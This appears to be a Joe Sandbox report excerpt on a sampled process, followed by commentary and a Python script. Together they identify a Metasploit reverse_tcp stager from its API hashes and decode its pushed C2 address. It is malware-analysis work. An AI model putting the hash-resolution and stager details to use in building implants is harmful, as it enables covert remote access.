                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage: 42.8%
                                                              Dynamic/Decrypted Code Coverage: 100%
                                                              Signature Coverage: 0%
                                                              Total number of Nodes: 10
                                                              Total number of Limit Nodes: 3
                                                              execution_graph nodes (id: address [API]):
                                                              • 34: 580000
                                                              • 36: 580006
                                                              • 37: 580095
                                                              • 38: 5800aa
                                                              • 39: 5800bc WSASocketA
                                                              • 40: 5800d8 connect
                                                              • 41: 5800f1 recv
                                                              • 42: 580139 closesocket
                                                              • 43: 5800e7
                                                              • 44: 580157
                                                              execution_graph edges: 34->37, 36->36, 37->38, 38->39, 39->40, 40->41, 40->43, 41->42, 41->43, 42->39, 42->43, 43->40, 43->41, 43->42, 43->44, 44->36

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph nodes: 0 Function_00580000, 1 Function_00580095
                                                              callgraph edges: 0->1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph basic blocks (id: address range [API]):
                                                              • 0: 580095-5800ba
                                                              • 3: 5800bc-5800d7 WSASocketA
                                                              • 4: 5800d8-5800e5 connect
                                                              • 5: 5800f1-580101 recv
                                                              • 6: 5800e7-5800ea
                                                              • 7: 5800ec call 580158
                                                              • 8: 580139-580146 closesocket
                                                              • 9: 580103-580117
                                                              • 10: 58014c
                                                              • 13: 580118-580127
                                                              • 15: 580129-580132
                                                              • 16: 580151-580155
                                                              • 17: 580157
                                                              control_flow_graph edges: 0->3, 3->4, 4->5, 4->6, 5->8, 5->9, 6->4, 6->7, 7->5, 8->3, 8->10, 9->13, 10->7, 13->15, 13->16, 15->8, 16->13, 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 005800D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 005800E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 005800FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0058013F
                                                              Memory Dump Source
                                                              • Source File: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_53_2_580000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: bfe1b6e906da5a7b4e982e2a360097eda895f4a0793274a32a426a5b5615d92e
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: 8D11ADB06802987EF57032629C4BFBB6D1CEF42BA4F101424BF45FA0C1C9829C4882FA
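                                                              The first value recorded for each WS2_32 call in the 0x580000 region (E0DF0FEA for WSASocketA, 6174A599 for connect, 5FC8D902 for recv, 614D6E75 for closesocket) is not a real parameter of that API: it is the API hash the stager pushes immediately before `call ebp`, which is why it sits in the first argument slot. The recv call reading exactly 4 bytes, the closesocket that loops back to WSASocketA, and the 5F327377/00003233 pair deeper in the stack (the inline string "ws2_32", pushed for the LoadLibraryA call that precedes the socket calls in the stock stager) are the remaining fingerprints of a Metasploit reverse_tcp stager. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it recomputes the constants with the Metasploit block_api hash (ROR13 over the upper-cased UTF-16 module name and over the ASCII export name, each including its NUL terminator) to confirm the identification, and decodes the literal dwords from the WSASocketA argument line. The candidate export list, the decode_sockaddr helper, and the assumption that the two dwords next to the retry counter 0000000A on that line hold the stager's sockaddr_in (family/port and host, as the stock layout pushes them) are the example's own, not statements made by the report.

```python
"""Added example (not from the Joe Sandbox report or the sample): label the
constants the report lists as arguments of the WS2_32 calls at 0x580000.
Assumptions: the constants are Metasploit block_api hashes; the two dwords
next to the retry counter 0x0000000A on the WSASocketA line are the stager's
sockaddr_in in the stock layout; the candidate export list is ours."""

import struct
from typing import Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int = 13) -> int:
    """32-bit rotate right, what `ror edi, 13` does in the resolver loop."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(data: bytes) -> int:
    """h = ror13(h) + byte for every byte, with 32-bit wraparound
    (the `ror edi, 13` / `add edi, eax` loop of Metasploit's block_api)."""
    h = 0
    for b in data:
        h = (ror32(h) + b) & MASK32
    return h


def block_api_hash(module: str, export: str) -> int:
    """Metasploit block_api value for module!export: ROR13 hash of the
    upper-cased UTF-16 BaseDllName including its NUL (the PEB stores it that
    way) plus ROR13 hash of the ASCII export name including its NUL."""
    mod = (module.upper() + "\x00").encode("utf-16-le")
    fn = (export + "\x00").encode("ascii")
    return (ror13_hash(mod) + ror13_hash(fn)) & MASK32


# Exports a Windows reverse_tcp stager typically resolves (assumed list;
# extend it with whatever other hashes a sample pushes).
CANDIDATES = [
    ("kernel32.dll", "LoadLibraryA"),
    ("kernel32.dll", "VirtualAlloc"),
    ("kernel32.dll", "ExitProcess"),
    ("ws2_32.dll", "WSAStartup"),
    ("ws2_32.dll", "WSASocketA"),
    ("ws2_32.dll", "connect"),
    ("ws2_32.dll", "recv"),
    ("ws2_32.dll", "closesocket"),
]
HASH_TABLE = {block_api_hash(m, e): f"{m}!{e}" for m, e in CANDIDATES}


def label_constant(value: int) -> Optional[str]:
    """Return 'module!export' if value is a known block_api hash, else None."""
    return HASH_TABLE.get(value & MASK32)


def dwords_to_ascii(*dwords: int) -> str:
    """Decode little-endian dwords that were pushed as an inline
    NUL-terminated string (e.g. 5F327377, 00003233 -> 'ws2_32')."""
    raw = b"".join(struct.pack("<I", d) for d in dwords)
    return raw.split(b"\x00", 1)[0].decode("ascii")


def decode_sockaddr(family_port: int, host: int) -> Tuple[int, int, str]:
    """Decode the two dwords the stock stager pushes as a sockaddr_in:
    low word sin_family, high word sin_port in network byte order, then
    sin_addr as four bytes in memory order (assumed layout)."""
    fam, port_raw = struct.unpack("<HH", struct.pack("<I", family_port))
    port = struct.unpack(">H", struct.pack("<H", port_raw))[0]
    addr = ".".join(str(b) for b in struct.pack("<I", host))
    return fam, port, addr


# Constants copied from the report's API lines for the 0x580000 region.
REPORTED_HASHES = {
    "WSASocketA  ref 005800D5": 0xE0DF0FEA,
    "connect     ref 005800E1": 0x6174A599,
    "recv        ref 005800FC": 0x5FC8D902,
    "closesocket ref 0058013F": 0x614D6E75,
}

if __name__ == "__main__":
    for where, const in REPORTED_HASHES.items():
        print(f"{where}: {const:08X} -> {label_constant(const)}")
    print("inline string:", dwords_to_ascii(0x5F327377, 0x00003233))
    print("sockaddr_in (assumed layout):",
          decode_sockaddr(0x61040002, 0x17DDB993))
```

                                                              If every pushed hash labels cleanly and the string decodes to "ws2_32", the function is the stock stager rather than a hand-rolled downloader; the sockaddr decode is only as good as the layout assumption, so cross-check its result against the network section of the report before treating it as the C2 endpoint.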